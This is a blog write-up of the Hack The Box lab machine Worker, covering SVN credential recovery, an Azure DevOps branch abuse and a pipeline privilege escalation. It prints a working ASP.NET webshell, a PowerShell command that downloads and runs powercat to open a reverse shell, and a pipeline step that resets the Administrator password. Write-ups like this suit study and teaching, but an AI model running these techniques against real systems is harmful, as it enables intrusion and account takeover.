19th January 2022
Hack The Box Worker Write-Up by T13nn3s

Hack The Box – Worker –

Concentrate all your thoughts upon the work in hand. The sun’s rays do not burn until brought to a focus

Alexander Graham Bell

About Worker

In this post, I’m writing a write-up for the machine Worker from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Worker is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag your points will be raised by 30.

After the initial port scan with Nmap, I found two open ports. The first port was HTTP 80/tcp and the other one 3690/tcp. The last port was a new port for me, I didn’t recognize the service. After some searching on the web, I found this SVN service and connected to this service. Through the commits, I could find the credentials for the foothold in the file deploy.ps1.

With these credentials, I was able to authenticate against the web service, running in the HTTP-port, and landed on the Azure DevOps Server installation. Through upload a shell.aspx for a webshell, I could establish a reverse shell to my machine. It has taken a while before I found out that there is an additional drive attached to this machine with the Azure repository files. In one of the files, I found a list of credentials. I matched this list with the listed user accounts in the C:\Users folder and could establish a WinRM session to grab the user flag.

In the end, the root part was very easy. Because I’m not a programmer I had need one nudge to fully understand what I have to do. I have created an automated pipeline and added a malicious script in the pipeline which could change the Administrator password. After running the pipeline, I was able to establish a WinRM connection to grab the root flag.

Machine Info

Hack The Box Worker Write-Up by T13nn3s
Hack The Box Worker Machine Info
Hack The Box Worker Machine IP and maker
Hack The Box Worker Machine IP and maker


Port scan

As always I start the reconnaissance phase with an Nmap port scan.

~$ nmap -sC -sV -oA ./nmap/

The results of the port scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 07:05 CEST
Nmap scan report for
Host is up (0.033s latency).
Not shown: 998 filtered ports
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds

Webserver – Microsoft IIS httpd 10.0
According to the results of the port scan, I’m dealing with a web server, because the HTTP port 80/tcp is open and Microsoft IIS version 10.0 is running. A potential risk is found on this server as the sysadmin has left the TRACE method in the open. It is one of the most common vulnerabilities found on webservers these days. It is usually used for troubleshooting and should be turned off. Only turn it on when it is needed for diagnostics.

SVNServe Subversion
I know that port 3690/tcp is the default port for the svc:// protocol. But, I’m new to this, don’t know what it is. I will find out.

Enumeration Web Server

I visited the webpage on the URL and landed on the default webpage of ISS, with the title IIS Windows Server.

Hack The Box Worker IIS Default Webpage

I have tried some directory fuzzing with Wfuzz, but it’s a no go. Let’s jump to the SVN-protocol.

Enumeration SVN

Before I can start using the SVN command-line tools, I have to install the Command Line Tools package in order to use these commands. I’m running on a MacBook Pro and since the installation of Catalina 10.15 the “Command line tool support for Subversion — including svn, git-svn, and related commands — is no longer provided by Xcode”, according to the macOS Catalina 10.15 Release Notes.

I have to install SVN support, with these commands.

MBP-from-t13nn3s$ brew install svn
MBP-from-t13nn3s$ sudo rm -rf /Library/Developer/CommandLineTools

After support for Subversion is installed. I need to know what this is. After some Googling, I found that this a program to manage and track changes in code and projects. It’s a version control system like Git. With this knowledge, I can proceed.

I need to find a working project. I have done a quick search on DuckDuckGo and found this website: https://www.perforce.com/blog/vcs/svn-commands-cheat-sheet. This website contains the Basic SVN Commands.

The command svn info displays information about a local or remote item. In this case, I want information about the remote item.

~$ svn list svn://

I found one directory with the name dimension.worker.htb and the file moved.txt. The second step is to checkout this repository to download all of the contents to my machine.

~$ svn checkout svn://                                                                                                                     
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js
A    dimension.worker.htb/assets/js/breakpoints.min.js
A    dimension.worker.htb/assets/js/browser.min.js
A    dimension.worker.htb/assets/js/jquery.min.js
A    dimension.worker.htb/assets/js/main.js
A    dimension.worker.htb/assets/js/util.js
A    dimension.worker.htb/assets/sass
A    dimension.worker.htb/assets/sass/base
A    dimension.worker.htb/assets/sass/base/_page.scss
A    dimension.worker.htb/assets/sass/base/_reset.scss
A    dimension.worker.htb/assets/sass/base/_typography.scss
A    dimension.worker.htb/assets/sass/components
A    dimension.worker.htb/assets/sass/components/_actions.scss
A    dimension.worker.htb/assets/sass/components/_box.scss
A    dimension.worker.htb/assets/sass/components/_button.scss
A    dimension.worker.htb/assets/sass/components/_form.scss
A    dimension.worker.htb/assets/sass/components/_icon.scss
A    dimension.worker.htb/assets/sass/components/_icons.scss
A    dimension.worker.htb/assets/sass/components/_image.scss
A    dimension.worker.htb/assets/sass/components/_list.scss
A    dimension.worker.htb/assets/sass/components/_table.scss
A    dimension.worker.htb/assets/sass/layout
A    dimension.worker.htb/assets/sass/layout/_bg.scss
A    dimension.worker.htb/assets/sass/layout/_footer.scss
A    dimension.worker.htb/assets/sass/layout/_header.scss
A    dimension.worker.htb/assets/sass/layout/_main.scss
A    dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    dimension.worker.htb/assets/sass/libs
A    dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    dimension.worker.htb/assets/sass/libs/_functions.scss
A    dimension.worker.htb/assets/sass/libs/_mixins.scss
A    dimension.worker.htb/assets/sass/libs/_vars.scss
A    dimension.worker.htb/assets/sass/libs/_vendor.scss
A    dimension.worker.htb/assets/sass/main.scss
A    dimension.worker.htb/assets/sass/noscript.scss
A    dimension.worker.htb/assets/webfonts
A    dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    dimension.worker.htb/images
A    dimension.worker.htb/images/bg.jpg
A    dimension.worker.htb/images/overlay.png
A    dimension.worker.htb/images/pic01.jpg
A    dimension.worker.htb/images/pic02.jpg
A    dimension.worker.htb/images/pic03.jpg
A    dimension.worker.htb/index.html
A    moved.txt
Checked out revision 5.

Let’s first read the contents of the file moved.txt.

~$ cat moved.txt 
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

This is interesting information. I had already added the hostname worker.htb to my host’s file. I have added the subdomain devops.worker.htb and dimension.worker.htb to my host’s file. Let’s first try to visit this new devops URL through the browser. On visiting https://devops.worker.htb, an authentication popup is coming up.

Hack The Box Worker devops.worker.htb

I need to find credentials. But second, let’s try to find out if there is also a web service running on the virtual host dimension.worker.htb. I visited this page on http://dimension.worker.htb.

Hack The Box Worker dimension.worker.htb

This website got a bunch of redirects to other subdomains. I’ve added the all one by one to my host’s file:

  1. alpha.worker.htb
  2. lens.worker.htb
  3. artoon.worker.htb
  4. solid-state.worker.htb
  5. spectral.worker.htb
  6. story.worker.htb

I have checked the contents of this website, but no fancy data.

Let’s go back to the worker copy. I got the directory dimensions.worker.htb, let’s read the contents. After I’ve read the contents of the files, I found nothing interesting.

With the command svn info. I can get information about a repository.

~$ svn info svn://devops.worker.htb
Path: .
URL: svn://devops.worker.htb
Relative URL: ^/
Repository Root: svn://devops.worker.htb
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 15:52:00 +0200 (za, 20 jun 2020)

I got the user Nathan, this can be a possible username. Let’s try to find more information about this repo, maybe in the log.

~$ svn log svn://
r5 | nathen | 2020-06-20 15:52:00 +0200 (za, 20 jun 2020) | 1 line

Added note that repo has been migrated
r4 | nathen | 2020-06-20 15:50:20 +0200 (za, 20 jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
r3 | nathen | 2020-06-20 15:46:19 +0200 (za, 20 jun 2020) | 1 line

r2 | nathen | 2020-06-20 15:45:16 +0200 (za, 20 jun 2020) | 1 line

Added deployment script
r1 | nathen | 2020-06-20 15:43:43 +0200 (za, 20 jun 2020) | 1 line

First version

I know definitely that Nathan is our guy, I need to find his password. This repository got’s multiple versions, let’s try to revert to another version. In version r2 a deployment script was added. In the current version r5 this script is gone. With the svn merge -r [current_version:[previous_version] [repository_url], I can revert to this particular version.

~$ sudo svn merge -r r5:r2 svn://
--- Reverse-merging r5 through r3 into '.':                                                                                                                                              
   C moved.txt
A    deploy.ps1
--- Recording mergeinfo for reverse merge of r5 through r3 into '.':
 U   .
--- Eliding mergeinfo from '.':
 U   .
~$ ls
deploy.ps1              dimension.worker.htb

The file moved.txt is gone, but I got now an PowerShell script. The contents of the PowerShell script:

$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

I got credentials!


Azure DevOps

I got now the credentials of the user Nathen, let’s try to log in on http://devops.worker.htb. After the successful login I got redirected to Azure DevOps with the project SmartHotel360 on the screen. This is the only project in the ekenas repository.

Hack The Box Worker access as nathen
http://devops.worker.htb access as Nathen

As this is the only project, I need to focus on this one and start the enumeration of this project. This project has one Branch, which is the master branch. I have checked the files in this branch and it has multiple repositories. According to the default chosen repository name and the file index.html, this is the project for the website spectral.worker.htb.

Hack The Box Worker Azure DevOps Enumeration

I need to get access to the backend of this server. The best way to do that is to add a new file with a reverse shell payload and access this file from the website. This box is running on a Windows machine, so I thought I need to create a .aspx (ASP.NET) reverse shell. But, I have tried some of them and created my own .aspx reverse shell, but for some reason, it will not work. So, I need to change my tactics a little bit… I switched from the .aspx reverse shell to a webshell and download from that webshell a PHP-payload with a reverse shell.

I do not have permission to add directly a file to the master branch, I receive the error message: ‘TF402455: Pushes to this branch are not permitted; you must use a pull request to update this branch.’

I have to create a new Branch, I give this branch the name ‘T13nn3s’.

Hack The Box Worker create branch
Branch T13nn3s created

I’ve added a feature request as a Work Item with the name ‘revshell’. You get it? I ask for a reverse shell feature? My bad, I have strange humor. Well go on T13nn3s, you need to hack this box. 🙂

I found on the GitHub page from tennec, a lovely ASP.NET webshell.

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>

<script runat="server">      
Sub RunCmd(Src As Object, E As EventArgs)            
  Dim myProcess As New Process()            
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)            
  myProcessStartInfo.UseShellExecute = false            
  myProcessStartInfo.RedirectStandardOutput = true            
  myProcess.StartInfo = myProcessStartInfo            
  Dim myStreamReader As StreamReader = myProcess.StandardOutput            
  Dim myString As String = myStreamReader.Readtoend()            
  result.text= vbcrlf & "<pre>" & mystring & "</pre>"    
End Sub

<form runat="server">        
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>        
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>        
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>        
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>        
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>        
<p><asp:Label id="result" runat="server"></asp:Label>       

I uploaded this webshell to the T13nn3s branch and linked this upload to my “feature” request. Linking this file to a work item is mandatory to get the merge from my branch into the master branch.

Hack The Box Worker upload ASP NET webshell

After the pull request, the file cmd.aspx is listed in the master branch.

Hack The Box Worker ASP NET webshell in master branch

I should now have access to this webshell from the web browser. I’ve visited this URL http://spectral.worker.htb/cmd.aspx, and I got a webshell.

Hack The Box Worker Write-Up webshell access

The next step is to get a reverse shell. I used Powercat, from Bessimorhino’s Github repo: https://github.com/besimorhino/powercat. I have downloaded the file powercat.ps1 through the webshell to the box and directly launched the reverse shell.

Hack The Box Worker Powercat reverse shell
Powercat reverse shell
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c -p 4444 -e cmd"

Reverse Shell as defaultapppool

After clicking on ‘Run’, the reverse shell established.

~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
Connection from
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.


iis apppool\defaultapppool


I immediately switched to PowerShell and started to enumerate this box. I found that 2 user accounts are listed on this machine.

PS C:\users> dir

    Directory: C:\users

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-03-28     14:59                .NET v4.5                                                             
d-----       2020-03-28     14:59                .NET v4.5 Classic                                                     
d-----       2020-08-18     00:33                Administrator                                                         
d-r---       2020-03-28     14:01                Public                                                                
d-----       2020-07-22     01:11                restorer                                                              
d-----       2020-07-08     19:22                robisl

I poked some around and found the inetpub. page from IIS, with the default website. I have searched further, but I could not find the DevOps page. Also, the SVN directory could not be found. It’s the first time for me, that I’ve seen this on Hack The Box… I checked if there are any other drives listed on this box and it appears that there is a W:\ driver present.

I changed the directory and there are the files I’m looking for.

PS C:\inetpub> wmic logicaldisk get caption
wmic logicaldisk get caption

PS C:\inetpub> cd W:\
cd W:\
PS W:\> ls

    Directory: W:\

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos

From the list of files, I found the file passwd with a list of usernames and passwords.

PS W:\svnrepos\www\conf> cat passwd
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
PS W:\svnrepos\www\conf>

I already know that there is a username robisl listed on this box. I decide to use the username and password combination robisl:wolves11.

Shell as robisl

With Evil-WinRM I created a session on this box and grabbed the user flag.

evil-winrm -u robisl -p wolves11 -i

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> ls
*Evil-WinRM* PS C:\Users\robisl\Documents> cat ../Desktop/user.txt
*Evil-WinRM* PS C:\Users\robisl\Documents> 

Privilege Escalation


Let’s check what kind of user I’m and which privileges this user account has.

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami /all


User Name     SID
============= ==============================================
worker\robisl S-1-5-21-3082756831-2119193761-3468718151-1330


Group Name                             Type             SID                                            Attributes
====================================== ================ ============================================== ==================================================
Everyone                               Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
WORKER\Production                      Alias            S-1-5-21-3082756831-2119193761-3468718151-1018 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

He’s a member of the production group, let’s jump back to https://devops.worker.htb and sign-in with his credentials. After signing in there is one project visible with the name PartsUnlimited.

Hack The Box Worker DevOps as robisl
https://devops.worker.htb as robisl

I’m not a programmer, so it has taken me some time and a nudge to found out what I have to do next. It seems that I have to create a pipeline and do something with a script. After enumerating harder and do stuff with the pipeline, I came on this path to root this machine.

I have started an automated build, by going to Pipelines and then to Builds and clicking on New Pipeline.

Hack The Box Worker starting pipeline
Building a new pipeline

As this box is using the Azure Devops Server installation, I have chosen in the next screen for Azure Repos Git.

Hack The Box Worker Azure Repos Git
Where is your code?

After I have selected the PartsUnlimited repository, I have chosen for the Starter Pipeline. This option allows me to start with a minimal build and deploy my code with a malicious payload.

 Hack The Box Worker Starter pipeline
Starter Pipeline

I used as the malicious payload this script:

net user administrator Iownthismachine!

This script is doing an easy thing; change the password of the Administrator-account.

Hack The Box Worker run script through pipeline
Malicious payload

The next step is clicking on Save and run, to run this pipeline.

Hack The Box Worker Pipeline is running
Job is running

After finishing this job, I assume that my script has being executed. Because, all the output was going so fast over my screen, I could barely read it. I used Evil-WinRm to establish the connection. And boom! I’m in as Administrator.

Last thing is to grab the root flag and this box is owned.

~$ evil-winrm -u administrator -p "Iownthismachine!" -i

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls

    Directory: C:\Users\Administrator\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/13/2020   8:24 AM           2012 Add-Restorer-Tasks.ps1
-a----        8/15/2020  11:34 AM            671 Deny-Write.ps1
-a----        7/14/2020   1:49 PM            408 Revoke-IIS-PrimaryTokenPrivilege.ps1
-a----         7/8/2020   8:14 PM          63995 UserRights.psm1

*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt

Did you like this write-up? Please consider to give me a respect point: https://app.hackthebox.eu/profile/224856.

Happy hacking!


I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *